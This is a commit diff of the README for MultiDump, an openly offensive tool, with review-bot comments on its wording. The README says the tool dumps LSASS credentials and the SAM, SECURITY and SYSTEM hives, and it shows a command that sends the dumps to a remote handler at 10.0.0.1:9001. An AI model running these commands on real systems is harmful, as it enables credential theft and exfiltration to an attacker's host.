Update README.md
Xre0uS authored Aug 8, 2024
1 parent 972fc30 commit 92d3514
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions README.md
@@ -74,6 +74,8 @@ MultiDump.exe
If `--procdump` is used, `ProcDump.exe` will be writtern to disk to dump LSASS.
In cmd, `--procdump` _must_ be used, or it will fail per [#5](https://github.com/Xre0uS/MultiDump/issues/5), recommend to always use powerhsell if possible.
In remote mode, MultiDump connects to the handler's listener.
```bash
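Review bot: the cmd caveat placed under the `--procdump` description still carries the typo "powerhsell" and a comma splice ("..., recommend to always use ..."), and since the sentence is being moved anyway this is the place to fix both. Something like "In cmd, `--procdump` _must_ be used or the dump fails (see #5); use PowerShell where possible." reads more cleanly. The context line just above it also has "writtern" for "written", which could be corrected in the same commit.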
@@ -85,8 +87,6 @@ In remote mode, MultiDump connects to the handler's listener.
MultiDump.exe -r 10.0.0.1:9001
```
In cmd, `--procdump` _must_ be used, or it will fail per [#5](https://github.com/Xre0uS/MultiDump/issues/5), recommend to always use powerhsell if possible.
The key is encrypted with the handler's IP and port. When MultiDump connects through a proxy, the handler should use the `--override-ip` option to manually specify the IP address for key generation in remote mode, ensuring decryption works correctly by matching the decryption IP with the expected IP set in MultiDump `-r`.
An additional option to dump the `SAM`, `SECURITY` and `SYSTEM` hives are available with `--reg`, the decryption process is the same as LSASS dumps. This is more of a convenience feature to make post exploit information gathering easier.
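Review bot: in the context that follows the relocated cmd sentence, "The key is encrypted with the handler's IP and port" does not say which key is meant or how the IP and port are combined, so the `--override-ip` requirement in the same paragraph is hard to act on. Stating explicitly which key this is, and that the handler's value must equal the address passed to `-r`, would make the proxy case unambiguous. In the `--reg` sentence, "An additional option ... are available" should be "is available", and the comma before "the decryption process" should be a full stop.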
